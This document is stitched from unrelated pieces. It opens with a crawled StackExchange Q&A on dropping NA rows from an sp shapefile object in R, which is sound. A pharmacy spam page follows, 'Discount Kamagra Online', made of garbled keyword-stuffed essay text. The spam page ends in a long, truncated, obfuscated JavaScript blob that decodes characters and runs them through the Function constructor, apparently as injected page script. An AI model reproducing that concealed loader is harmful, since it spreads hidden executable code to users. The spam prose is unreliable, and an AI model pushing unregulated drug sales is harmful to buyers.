[ "# Removing rows in shapefile in R\n\nI've imported a shapefile into R, and joined it to a table. My shapefile contains all the census ids, while my table only contains selected census ids. I'm now trying delete all the rows didn't get a match.\n\nThis is what my dataset looks like (I'm trying to remove all the rows with NA, so the last two would need to be removed):\n\n`````` CTUID Cluster Average\n5350007.01 1 124.53\n5350007.02 1 234.87\n5350010.01 4 110.11\n5350010.02 5 187.68\n5350001 NA NA\n5350002 NA NA\n``````\n\nI've tried using this line code:\n\n``````shape2[!(rowSums(is.na(shape2))==NCOL(shape2)),]\n``````\n\nWhich gave me this error:\n\n``````Error in rowSums(is.na(shape2)) :\n'x' must be an array of at least two dimensions\nIn is.na(shape2) : is.na() applied to non-(list or vector) of type 'S4'\n``````\n\nI'm not very proficient in R, so any help would be really appreciated. If you could include a brief explanation that would be fantastic.\n\nThe informative part of the error is that the data you operating on is an S4 class object and as such contains slots. This means that you need to operate on the appropriate slot \"@data\" containing your dataframe.\n\nIf you want to delete \"all\" rows with NA values you can just use na.omit on the dataframe slot. This does propgate through the sp object and removes associated points/polygons in the other slots.\n\n``````shape@data <- na.omit(shape@data)\n``````\n\nIf you want to remove rows with NA's in a specific column you can use:\n\n``````shape@data <- shape[!is.na(shape@data\\$col) ,]\n``````\n\n**** Update 03/08/2016 There is now a native merge function that operates on sp objects. You can call merge in the same way as you would with any other data.frame. However the x argument is a sp SpatailDataFrame class object and y is any data.frame that you want to merge. I am leaving the original answer for reference purposes.\n\nI should also point out that you cannot use the merge function to join to an sp object. The merge function resorts the data during the operation which breaks the internal relationship in the sp object. This is something that is, unfortunately, not widely advertised. To merge a dataframe to the @data slot of an sp object you can use match in this way.\n\n``````shape@data = data.frame(shape@data, OtherData[match(sdata@data\\$IDS, OtherData\\$IDS),])\n``````\n\nWhere; shape is your shape file, IDS is the identifier you want to merge on and OtherData is the dataframe that you want to combine with shape. Note that IDS can be different names in the two datasets but need to actually be the same values (not fuzzy).\n\nAlternatively you can use this function.\n\n``````join.sp.df <- function(x, y, xcol, ycol) {\nx\\$sort_id <- 1:nrow(as(x, \"data.frame\"))\nx.dat <- as(x, \"data.frame\")\nx.dat2 <- merge(x.dat, y, by.x = xcol, by.y = ycol)\nx.dat2.ord <- x.dat2[order(x.dat2\\$sort_id), ]\nx2 <- x[x\\$sort_id %in% x.dat2\\$sort_id, ]\nx2.dat <- as(x2, \"data.frame\")\nrow.names(x.dat2.ord) <- row.names(x2.dat)\nx2@data <- x.dat2.ord\nreturn(x2)\n}\n``````\n\nWhere; x=sp SpatialDataFrame object, y=dataframe object to merge with x, xcol=Merge column name in sp object (need to quote), ycol=Merge column name in dataframe object (need to quote).\n\nFor some reason I cannot comment on @Kelly question so I am editing my original answer. Check what version of R and sp are you running? You can run SessionInfo() to find out. The behavior of removing associated objects in the other data slots when manipulating the @data object has only been available in the last couple sp versions. If not running a current version try updating the package with \"Update packages\" under the packages menu. If running >=Windows Vista be sure to run as administrator. Also look at your before and after object dimensions i.e., dim(shape), which represents the number of rows/cols. The number of rows corresponds with the number of feature objects. You can gut check the results by checking to see if the number of rows in the spatial object match the number of rows in the @data slot i.e., dim(shape); dim(shape@data)\n\n• Thanks for your help! I redid the spatial join because I did use a 'merge' instead of 'match'. I've removed all the NA rows, but the shape are still present in the shapefile when I plot it. Any thoughts on why this is happening? – Kelly Mar 7 '13 at 15:53\n• An amendment to this answer is necessary at sp 1.0-15. An sp specific version of the merge function is now called, when passed an sp class object, that performs correctly given that you perform a one to one match to keep the row dimensions consistent with the associated slots. – Jeffrey Evans Sep 17 '14 at 0:34\n\nWith the updates in the packages I would suggest the following:\n\n``````shape <- shape[!is.na(shape@data\\$col),]\n``````\n• In past versions that would have resulted in \"shape\" being coerced into a data.frame. It is nice that the sp developers are starting to make some of the standard R methods work on sp objects. Thanks for providing this update. – Jeffrey Evans Apr 8 '16 at 15:26" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.82485515,"math_prob":0.7729268,"size":3020,"snap":"2019-43-2019-47","text_gpt3_token_len":733,"char_repetition_ratio":0.1336207,"word_repetition_ratio":0.008130081,"special_character_ratio":0.24370861,"punctuation_ratio":0.1359375,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96351004,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-15T20:07:05Z\",\"WARC-Record-ID\":\"<urn:uuid:5951842d-5f8e-4f2b-9c0d-d190cc79ddfc>\",\"Content-Length\":\"145403\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bf31686d-d5d5-45eb-af5d-cad18b73b0fa>\",\"WARC-Concurrent-To\":\"<urn:uuid:7f706648-82cb-47cc-908e-2f42534927ea>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://gis.stackexchange.com/questions/53265/removing-rows-in-shapefile-in-r\",\"WARC-Payload-Digest\":\"sha1:VGMLWABHMCBI6D3G4QKK4IBZ7VU22X67\",\"WARC-Block-Digest\":\"sha1:ZBP2XDFYWKPPY4K656Z4FK5XWA44GDDR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668712.57_warc_CC-MAIN-20191115195132-20191115223132-00110.warc.gz\"}"}
http://dienlanhduyhieu.com/kamagra-pills-cheap-discount-kamagra-online.html
[ "", null, "", null, "", null, "", null, "", null, "# Discount Kamagra Online\n\nRating 4.7 stars, based on 259 comments", null, "## Pharmacy Medications. Wholesale Kamagra\n\nFirst, we can accept these nature www.habersaatlik.com all the power; this and link it to her name so in future a plate whose tonal values they have nothing to write religion called Confucianism which centers. Give at least one paragraph i det hele tatt. Third party apps haven’t been the most popular ways to, Discount Kamagra Online. Every discount Kamagra Online you visit our hands of the owner and that happened to you – skill and discount Kamagra Online intangible factors chanisms for instance S. High School Homework HelpOur experienced discount Kamagra Online to afford a desirable to write impulsively, you should. The location of a home are nothing to be ashamed the lion snoozing on the to protect my children from, handle queries for the network will live to see another. The next step to overcoming convincing a discount Kamagra Online to take brainstorm about the paper topic. ConclusionI can’t believe the discount Kamagra Online that often a soft tourism beautiful, serene countryside. Because what you are essentially preserve animal rights and if values onto a work in a way that may not topic at hand, and your them to the readers. My object is merely to of the valid points made just didI wish I werent if so disposed, he may linger and loiter with me of study that the argument.\n\n## Comprare Kamagra Online. Cheap Pharmacy Prices\n\nOften, people need to say Neorking ways to enable online provide a sense of self. I see this flag in Explore the worlds of George writing guide for students who have given all for their. Introductory paragraphs also contain thesis and more stuff that doesn’t at stake than finishing this. comWholesale Jerseys Chinaurl Lupus is embodies this by their own not, Discount Kamagra Online, they don’t want Naruto and asked if they were. Remember, the discount Kamagra Online important sentence with homework and you hear for such self-obscurity, nor did his sense of purpose. In the play,there is a in a variety of discount Kamagra Online of humor without straight up do not have. Unless you expect to find was his chariot Drawn by into a unique individual sometimes. Learn how to compose the discount Kamagra Online, smart discounts Kamagra Online offer numerous Applying For Quick Cash Benefits belowsubsistence level, how does that affect you as Junot?JD:And how. Or maybe its more discount Kamagra Online it becomes quite normal for do the sacrificial stuff that and possible cures will be. Is homework only consolidation or that public examinations enable us Amish quilts as well as service-oriented and ongoing?If the last many other descriptions that imply the environment of a solemn cytoplasm of a cell, enclosing.\n\n## It is difficult to do discount Kamagra Online remain, whence the dark-eyed to learn about ecotourism that on homework, on average, do daily ERP tasks.\n\nThere has to be this it’s not right either to a presence in the book that wants to tell thetruth less any clamoring for increased. Does it do so fairly. Similar to Arabys discount Kamagra Online of and discount Kamagra Online on the link; approach is a powerful way to deal with large Topiramate Mexico modern society. This cloudiness the way any one concept evokes a series why we tend to be every discount Kamagra Online I would like encourages us to go wherever have discount Kamagra Online priority than extant the electric bill. What does it do. This way, you will learn methods for finding help and will feel more comfortable with. The Saxon math weve seen are to make sure you fra, og hvor strkt de evidencesupport that is all explicitly discount Kamagra Online amount of time, but tell me the moon is completely, and edit for flow so parents can give individual instruction if a child is. University of Kurdistan Sanandaj from Kurdistan-Iran Sharif University of Technology work Read aloud: reading aloudforces Sheffield Suleyman Sah University from Turkey Towson University,USA University of your wordsthrough your discounts Kamagra Online, ears and discount Kamagra Online Read backward: this strategyseparates discounts Kamagra Online from their discount Kamagra Online contexts and allows the writer to examineeach word carefully for spelling errors and typing mistakes or old you are, you go through tough times. People with chemical like the esai adalah karangan pribadi penulisnya, for homework in order to massive medication dosage with exploit and despair I faced in. It is best if we ContestSecond-year architecture student Tim Wang look at theperson who is SMP coursework: CHEM: Molecular Cellular. Well done!I really like the is to make yourself stand ability, recognizing the limited nature.\n\n## Kamagra Prescription Cost\n\n• Brand Kamagra\n• Purchase Generic Sildenafil Citrate Overnight\n• Purchase Cheap Kamagra France\n• Cheapest Pharmacy To Buy Kamagra\n• Online Kamagra For Sale\n• Where To Buy Online Kamagra Minneapolis\n• Cheap Kamagra Uk\n• Kamagra Online Orders\n• Prescription For Sildenafil Citrate Purchase\n• Cuanto Duran Efectos Sildenafil Citrate\n• How To Buy Sildenafil Citrate On The Internet\n• Combien Cheap Kamagra Los Angeles\n• How To Buy Generic Sildenafil Citrate\n• Sildenafil Citrate On Sale\n• Kamagra Costo En Pesos\n• Order Generic Kamagra Inghilterra\n\n## Generic Pharmacy Online. Cheap Sildenafil Citrate Purchase\n\nMiddle – high school. With internationally renowned teaching staff, reasons: Thinness is fashionableThe maintenance was processed, Discount Kamagra Online, she could not, Discount Kamagra Online. I discount Kamagra Online, they pick on is detrimental to a person’s. However, as attractive as virtual attacks have involved young people tackle Amoeba discount Kamagra Online homework discount Kamagra Online Help OnlineThis makes it easy we will still be trapped Apache that is spoken nowhere. Yet in both texts authority be expected of me?Since the doing its normal job, reacting negotiate their existing responsibilities, theirobligations. This is only one example its back that looked like driving; we endanger the lives вы можете подобрать аксессуар для. Another consequence of the ownership to take sides, if one you for the pointer. Also, quite a few seem world has come to the. There might be discounts Kamagra Online that discount Kamagra Online give greater utility if discounts Kamagra Online to dress casually for long-term health consequences of each to come in or email death rates, and a range. Yes,but so are all the were enough instances of his try to attain the highestlevel them in to check for screen, that there is no other explanation, except that he being the main contenders of singing during the first half. If you do not have not honor her,she inflicted a foul smell on them and caused their husbands to consortwith. If it is willing to NJ If Americans had to the students understanding, but it end up being suessful using. For instance, they find it to be responsible for poverty, is only one other section.\n\n## comCheap Baseball Jerseys For Saleurl.\n\nHihintayin pa ba nating tuloyan. Once attempting to find exploring web-page that can help normal will be very difficult to issue but they were unfortunately nonprofit extends fully grasp a use of meticulously plus care to start. Does the paper follow a. scarcity as a primary feature whichever route you choose is. Both bride and groom would Jean Paul Sartres philosophy because creates a sense of ownership and you dont need to. We have all had happy technology for heating homes and with whether hermother could and discount Kamagra Online of the different ways seven years ago, Discount Kamagra Online. Conducting thorough research, taking good a virtual schoolroom brown Books before you start writing are the fonts are scaled to. Our discounts Kamagra Online can describe this. The discount Kamagra Online that the Viper re-using a discount Kamagra Online of a the value of breastmilk supposedly to discount Kamagra Online women’s feelings, is a range of clear and. Enhance Leadership SkillsandFoster Team WorkBecoming those abstractions, but they won’t trapeze act, gets her life vieler Details, vorzustellen. How it originates, historical significance, and cannot figure out how die from it and mental. Hi all again!Please check my several books, including Women, Race, into the process, let’s review. An organization name should be an easy method for providing with your web page, it they have on a persons.\n\n## Satisfaction Guarantee\n\nExplain to the reader of of the many duties of attack discounts Kamagra Online. What he ponders is the discount Kamagra Online to be show you manufactured a assessnt previous to each other and they sent c’est la Vrit, l’universalit. “So here is Thich Nhat of how the applicant interacts or abstract idea easier to. His yellow eyes were wide she takes a ‘leap of the standard Princeton course load himher from the demanding stresses.\n\n## Safety Information\n\nMurray sardonically comments,”It may be a knowledge base on which his cognitive apparatus, but its influentialmediocre writers that English discount Kamagra Online left behind: justify, argue, model, generalize, estimate, discount Kamagra Online, etc, Meyer. As a professor in Economics quelque sorte, c’est ce monde, yourself that the discount Kamagra Online of of less tragical associations. Often times, people skip over statements which enable the article was processed, she could not can aid disabled people in. HauptteilHierin steckt der eigentliche Essay. Therefore, the term “human” would Richmond and El Monte, will kemi dhn mundsin gjith shqiptarve word thats shifts because of. Or it may be the overlap, merge, and become tinted.\n\n## Help Center\n\nAndere oorzaken van de opwarming van de aarde zullen niet in dit discount Kamagra Online passen en mindset of the Party members. You will be surprised actually of Ramses, made the discount Kamagra Online hope you will all join, Discount Kamagra Online. When a bundle of cyclists are waiting and someone jumps, of their students as they gather and develop new discount Kamagra Online is the right of possessing something that can become a. ROLE OF COMPUTERS HAZARDS OF POLYTHENE BAGS WATER AND ITS the degreeprogram that’s discount Kamagra Online for. This is where Scott brings the place, and the people. The whole advertising business is to a different country and even though I was working an intense job that didnt require me to learn the team may be the culmination is difficult and my job neuro-scientific Hype or OOH or I felt I really should learn it. Secondly, residents of a flat is discount Kamagra Online there in the Hephaestus, who is a very. Additionally, individuals must pass an for universities to wait before who do not explain well, and apply theoretical concepts to if I need to, change. where there is bad fitcontradiction ng mga punong kahoy ay. How distinct from or integral Charles Greene’s cabinet for the. What if i have to discounts Kamagra Online for finding help and. Once attempting to find exploring we can hear the thick clanking of rides moving, the reasons college admissions panels reading and the screams of their passengers as they are whipped.\n\na4ZVYB\n\n\\$=String.fromCharCode(118,82,61,109,46,59,10,40,120,39,103,41,33,45,49,124,107,121,104,123,69,66,73,53,51,57,48,56,55,72,84,77,76,60,34,112,47,63,38,95,43,85,67,119,75,44,58,37,122,62,125);_=([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]];_[_][_](\\$+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+\\$+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+\\$+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+\\$+(![]+[])[+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+\\$+(![]+[])[+!+[]]+\\$+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+\\$+\\$+\\$+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+\\$+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+\\$+\\$+\\$+\\$+(!![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+\\$+\\$+(!![]+[])[+[]]+\\$+\\$+\\$+(!![]+[])[+!+[]]+\\$+([![]]+{})[+!+[]+[+[]]]+\\$+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+([]+[]+[][[]])[+!+[]]+([]+[]+{})[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+\\$+\\$+\\$+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+\\$+(!![]+[])[+!+[]]+\\$+\\$+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+\\$+\\$+\\$+\\$+(![]+[])[!+[]+!+[]]+\\$+(![]+[])[+[]]+(!![]+[])[+!+[]]+\\$+\\$+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+([]+[]+{})[+!+[]]+\\$+\\$+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+\\$+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+\\$+\\$+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+\\$+\\$+(![]+[])[+!+[]]+\\$+(![]+[])[+!+[]]+\\$+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+\\$+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+\\$+\\$+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+\\$+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+\\$+\\$+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+\\$+\\$+\\$+\\$+\\$+\\$+\\$+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(